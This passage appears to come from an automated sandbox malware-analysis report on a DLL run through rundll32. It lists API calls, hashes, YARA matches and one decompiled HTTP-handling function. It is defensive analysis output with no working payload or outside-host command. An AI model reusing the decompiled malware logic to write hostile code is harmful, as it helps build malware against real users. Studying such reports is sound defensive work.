                            • Opcode Fuzzy Hash: 4a5bb292ded357f6e578403dae0b5d57cbe689b13b985808ed9dccd30841558b
                            • Instruction Fuzzy Hash: 8D414A72D0021DFBDF21AFA4DD45FEEBBB8EB48701F14455AE601AA150D7B4AA42CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04F74943
                            • StrTrimA.SHLWAPI(?,?), ref: 04F74961
                            • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 04F749CA
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 04F749EB
                            • DeleteFileA.KERNEL32(?,00003219), ref: 04F74A0D
                            • HeapFree.KERNEL32(00000000,?), ref: 04F74A1C
                            • HeapFree.KERNEL32(00000000,?,00003219), ref: 04F74A34
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                            • String ID:
                            • API String ID: 1078934163-0
                            • Opcode ID: 252d32cca01a847d8c373f68ec7fee8037e700918eef13dafcb6977c74647ca9
                            • Instruction ID: af3b515aa54c8c6897a09e97e45d6ef54a9f5a218dc8295f1c5218fdd892ea70
                            • Opcode Fuzzy Hash: 252d32cca01a847d8c373f68ec7fee8037e700918eef13dafcb6977c74647ca9
                            • Instruction Fuzzy Hash: DA316D7260460AABE711EF54EC04F7A77E8EF45704F04045AFA44EF181D76DED0A9BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,04F68478,00000000), ref: 04F6E02B
                            • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 04F6E040
                            • memset.NTDLL ref: 04F6E04D
                            • HeapFree.KERNEL32(00000000,00000000,?,04F68477,?,?,00000000,?,00000000,04F79CD0,?,00000000), ref: 04F6E06A
                            • memcpy.NTDLL(?,?,04F68477,?,04F68477,?,?,00000000,?,00000000,04F79CD0,?,00000000), ref: 04F6E08B
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Allocate$Freememcpymemset
                            • String ID: chun
                            • API String ID: 2362494589-3058818181
                            • Opcode ID: f8407f686308a976cb51ed37a440d705d6bf02ea8216ea4f9c805e66959e0e36
                            • Instruction ID: d84efc36370a3f270a91c8e5a5d9b8f2badc9232cf3b8d23936de3f64a6a503f
                            • Opcode Fuzzy Hash: f8407f686308a976cb51ed37a440d705d6bf02ea8216ea4f9c805e66959e0e36
                            • Instruction Fuzzy Hash: 1B318076600705AFD7318F65DC44A66BBE9EF44314F00842AF94ACB620D734F906DF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A14A85(void* __ecx, void* __esi) {
                            				long _v8;
                            				long _v12;
                            				long _v16;
                            				long _v20;
                            				long _t34;
                            				long _t39;
                            				long _t42;
                            				long _t56;
                            				void* _t58;
                            				void* _t59;
                            				void* _t61;
                            
                            				_t61 = __esi;
                            				_t59 = __ecx;
                            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                            				do {
                            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                            					_v20 = _t34;
                            					if(_t34 != 0) {
                            						L3:
                            						_v8 = 4;
                            						_v16 = 0;
                            						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                            							_t39 = GetLastError();
                            							_v12 = _t39;
                            							if(_v20 == 0 || _t39 != 0x2ef3) {
                            								L15:
                            								return _v12;
                            							} else {
                            								goto L11;
                            							}
                            						}
                            						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                            							goto L11;
                            						} else {
                            							_v16 = 0;
                            							_v8 = 0;
                            							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                            							_t58 = E04A16D63(_v8 + 1);
                            							if(_t58 == 0) {
                            								_v12 = 8;
                            							} else {
                            								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                            									E04A16C2C(_t58);
                            									_v12 = GetLastError();
                            								} else {
                            									 *((char*)(_t58 + _v8)) = 0;
                            									 *(_t61 + 0xc) = _t58;
                            								}
                            							}
                            							goto L15;
                            						}
                            					}
                            					SetEvent( *(_t61 + 0x1c));
                            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                            					_v12 = _t56;
                            					if(_t56 != 0) {
                            						goto L15;
                            					}
                            					goto L3;
                            					L11:
                            					_t42 = E04A16E40( *(_t61 + 0x1c), _t59, 0xea60);
                            					_v12 = _t42;
                            				} while (_t42 == 0);
                            				goto L15;
                            			}
                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,761F81D0,00000000,00000000), ref: 04A14A9C
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A14AAC
                            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04A14ADE
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A14B03
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A14B23
                            • GetLastError.KERNEL32 ref: 04A14B35
                              • Part of subcall function 04A16E40: WaitForMultipleObjects.KERNEL32(00000002,04A17BB5,00000000,04A17BB5,?,?,?,04A17BB5,0000EA60), ref: 04A16E5B
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • GetLastError.KERNEL32(00000000), ref: 04A14B6A
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                            • String ID:
                            • API String ID: 3369646462-0
                            • Opcode ID: d33ac3f4d16d09acd7f94656e079276b77fd3fa67a17125fa9d6f2313d6ce0f0
                            • Instruction ID: 1e19cb29ad49c04caf6ba51a2dedda8ab7b91caa1cca6ed27bcde3a82dea4152
                            • Opcode Fuzzy Hash: d33ac3f4d16d09acd7f94656e079276b77fd3fa67a17125fa9d6f2313d6ce0f0
                            • Instruction Fuzzy Hash: 51312CB5904309EFEB20DFE9CC84E9EBBB8EB1C300F10496AE542E2160D775AA45DF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 04F68ED3
                              • Part of subcall function 04F6A5E7: lstrlen.KERNEL32(00000000,7620F730,-00000001,00000000,?,?,?,04F68EF7,?,00000000,000000FF), ref: 04F6A5F8
                              • Part of subcall function 04F6A5E7: lstrlen.KERNEL32(?,?,?,?,04F68EF7,?,00000000,000000FF), ref: 04F6A5FF
                              • Part of subcall function 04F6A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04F6A611
                              • Part of subcall function 04F6A5E7: _snprintf.NTDLL ref: 04F6A637
                              • Part of subcall function 04F6A5E7: _snprintf.NTDLL ref: 04F6A66B
                              • Part of subcall function 04F6A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 04F6A688
                            • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 04F68F6D
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 04F68F8A
                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 04F68F92
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 04F68FA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                            • String ID: s:
                            • API String ID: 2960378068-2363032815
                            • Opcode ID: f6676ff0a69547d6b206fc0b3ced361a91f3176431daadac917cf695ee1bbe8e
                            • Instruction ID: 0a6fcca8d9bd93c88eb513e5655eb0bc8b9afb58ea751925547c412c905bfe3b
                            • Opcode Fuzzy Hash: f6676ff0a69547d6b206fc0b3ced361a91f3176431daadac917cf695ee1bbe8e
                            • Instruction Fuzzy Hash: DA312F72A00249BFDB10AFE9DC84FAE7BBCEB09355F04055DB605EA141E674BA058B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F613F6
                            • lstrcmpiW.KERNEL32(00000000,?), ref: 04F6142E
                            • lstrcmpiW.KERNEL32(?,?), ref: 04F61443
                            • lstrlenW.KERNEL32(?), ref: 04F6144A
                            • CloseHandle.KERNEL32(?), ref: 04F61472
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 04F6149E
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F614BC
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                            • String ID:
                            • API String ID: 1496873005-0
                            • Opcode ID: 680013ec03b3d211b9d68036e173a7dbed804162711529c8cec34f0b52ce9e73
                            • Instruction ID: b814a4af8af3466039a247888661f2ee345b5914dabd23d53c8ef655945286fd
                            • Opcode Fuzzy Hash: 680013ec03b3d211b9d68036e173a7dbed804162711529c8cec34f0b52ce9e73
                            • Instruction Fuzzy Hash: F82133B1A0060ABFDB109F75ED84E6B77BCEF05644B154569A902EB100D739ED069B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(04F6F67C,00000000,04F8A420,04F8A440,?,?,04F6F67C,04F7E453,04F8A420), ref: 04F6F802
                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04F6F818
                            • lstrlen.KERNEL32(04F7E453,?,?,04F6F67C,04F7E453,04F8A420), ref: 04F6F820
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F6F82C
                            • lstrcpy.KERNEL32(04F8A420,04F6F67C), ref: 04F6F842
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F6F67C,04F7E453,04F8A420), ref: 04F6F896
                            • HeapFree.KERNEL32(00000000,04F8A420,?,?,04F6F67C,04F7E453,04F8A420), ref: 04F6F8A5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrlen$lstrcpy
                            • String ID:
                            • API String ID: 1531811622-0
                            • Opcode ID: 7d715d8466f04396f85a6b0b52a0cf8c07ffc58976f1fc47bc9af2c82aeb27b6
                            • Instruction ID: 642f26634fe2ae0ddf7a1c9126bc5eeb25f120aeb7f5cd5e99593c3e5dc33db7
                            • Opcode Fuzzy Hash: 7d715d8466f04396f85a6b0b52a0cf8c07ffc58976f1fc47bc9af2c82aeb27b6
                            • Instruction Fuzzy Hash: 0621C531A04249BFEB124F68FC44F7A7FA6EB46354F144099E8599B211C775AC06D7B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,04F70E77,00000000), ref: 04F813DA
                              • Part of subcall function 04F73193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 04F731CD
                              • Part of subcall function 04F73193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,04F813E7,?,?,00000000,?,04F70E77,00000000), ref: 04F731DF
                              • Part of subcall function 04F73193: GetTickCount.KERNEL32 ref: 04F731EA
                              • Part of subcall function 04F73193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,04F813E7,?,?,00000000,?,04F70E77,00000000), ref: 04F731F6
                              • Part of subcall function 04F73193: lstrcpy.KERNEL32(00000000), ref: 04F73210
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(00000000), ref: 04F81415
                            • wsprintfA.USER32 ref: 04F81428
                            • GetTickCount.KERNEL32 ref: 04F8143D
                            • wsprintfA.USER32 ref: 04F81452
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                            • String ID: "%S"
                            • API String ID: 1152860224-1359967185
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,04F6314A,00000000), ref: 04F697BD
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,04F6314A,00000000,00000000,00000004,?,00000000,?), ref: 04F69830
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                            • String ID:
                            • API String ID: 2078930461-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7358E: lstrlen.KERNEL32(00000000,00000000,761F81D0,7749EEF0,?,?,?,04F7EA2E,?,761B5520,7749EEF0,?,00000000,04F6E842,00000000,0631C310), ref: 04F735F5
                              • Part of subcall function 04F7358E: sprintf.NTDLL ref: 04F73616
                            • lstrlen.KERNEL32(00000000,761F81D0,?,761B5520,7749EEF0,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA40
                            • lstrlen.KERNEL32(?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA48
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • strcpy.NTDLL ref: 04F7EA5F
                            • lstrcat.KERNEL32(00000000,?), ref: 04F7EA6A
                              • Part of subcall function 04F7C32E: lstrlen.KERNEL32(?,?,?,00000000,?,04F7EA79,00000000,?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7C33F
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA87
                              • Part of subcall function 04F6930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04F7EA93,00000000,?,00000000,04F6E842,00000000,0631C310), ref: 04F69316
                              • Part of subcall function 04F6930C: _snprintf.NTDLL ref: 04F69374
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SwitchToThread.KERNEL32(?,?,04F7E846), ref: 04F69EAD
                            • CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F69EB9
                            • CloseHandle.KERNEL32(00000000,7620F720,?,04F63576,00000000,?,?,?,04F7E846), ref: 04F69ECB
                            • memset.NTDLL ref: 04F69EE2
                            • memset.NTDLL ref: 04F69EF9
                            • memset.NTDLL ref: 04F69F10
                            • memset.NTDLL ref: 04F69F27
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$CloseHandle$SwitchThread
                            • String ID:
                            • API String ID: 3699883640-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6CAAB
                            • wcstombs.NTDLL ref: 04F6CABC
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64975
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,00000020,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64984
                            • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04F6CADD
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 04F6CAEC
                            • CloseHandle.KERNEL32(00000000), ref: 04F6CAF3
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F6CB02
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F6CB12
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                            • String ID:
                            • API String ID: 417118235-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • lstrcpy.KERNEL32(-000000FC,00000000), ref: 04F731CD
                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,04F813E7,?,?,00000000,?,04F70E77,00000000), ref: 04F731DF
                            • GetTickCount.KERNEL32 ref: 04F731EA
                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,04F813E7,?,?,00000000,?,04F70E77,00000000), ref: 04F731F6
                            • lstrcpy.KERNEL32(00000000), ref: 04F73210
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                            • String ID: \Low
                            • API String ID: 1629304206-4112222293
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • wsprintfA.USER32 ref: 04F66F64
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 04F66F76
                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04F66FA0
                            • WaitForMultipleObjects.KERNEL32(00000002,04F72EB3,00000000,000000FF), ref: 04F66FB3
                            • CloseHandle.KERNEL32(04F72EB3), ref: 04F66FBC
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                            • String ID: 0x%08X
                            • API String ID: 603522830-3182613153
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetLastError.KERNEL32(?,?,?,00001000,?,04F8A2F4,7620F750), ref: 04F7D38B
                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,04F8A2F4,7620F750), ref: 04F7D410
                            • CloseHandle.KERNEL32(00000000,?,04F8A2F4,7620F750), ref: 04F7D42A
                            • OpenProcess.KERNEL32(00100000,00000000,00000000,?,04F8A2F4,7620F750), ref: 04F7D45F
                              • Part of subcall function 04F6D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,04F65546), ref: 04F6D6C0
                            • WaitForSingleObject.KERNEL32(?,00000064,?,04F8A2F4,7620F750), ref: 04F7D4E1
                            • CloseHandle.KERNEL32(F0FFC983,?,04F8A2F4,7620F750), ref: 04F7D508
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                            • String ID:
                            • API String ID: 3115907006-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • FileTimeToLocalFileTime.KERNEL32(00000000,04F72702), ref: 04F7B2DA
                            • FileTimeToSystemTime.KERNEL32(04F72702,?), ref: 04F7B2E8
                            • lstrlenW.KERNEL32(00000010), ref: 04F7B2F8
                            • lstrlenW.KERNEL32(00000218), ref: 04F7B304
                            • FileTimeToLocalFileTime.KERNEL32(00000008,04F72702), ref: 04F7B3F1
                            • FileTimeToSystemTime.KERNEL32(04F72702,?), ref: 04F7B3FF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                            • String ID:
                            • API String ID: 1122361434-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlImageNtHeader.NTDLL(?), ref: 04F6E428
                              • Part of subcall function 04F77A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,04F6E448,?), ref: 04F77A6A
                              • Part of subcall function 04F77A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F77A7C
                              • Part of subcall function 04F77A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,04F6E448,?), ref: 04F77A99
                              • Part of subcall function 04F77A3E: lstrlenW.KERNEL32(00000000,?,?,04F6E448,?), ref: 04F77AA5
                              • Part of subcall function 04F77A3E: HeapFree.KERNEL32(00000000,00000000,?,?,04F6E448,?), ref: 04F77AB9
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F6E460
                            • CloseHandle.KERNEL32(?), ref: 04F6E46E
                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 04F6E547
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F6E556
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 04F6E569
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                            • String ID:
                            • API String ID: 1719504581-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?), ref: 04F7D237
                            • GetLastError.KERNEL32 ref: 04F7D25D
                            • SetEvent.KERNEL32(00000000), ref: 04F7D270
                            • GetModuleHandleA.KERNEL32(00000000), ref: 04F7D2B9
                            • memset.NTDLL ref: 04F7D2CE
                            • RtlExitUserThread.NTDLL(?), ref: 04F7D303
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                            • String ID:
                            • API String ID: 3978817377-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
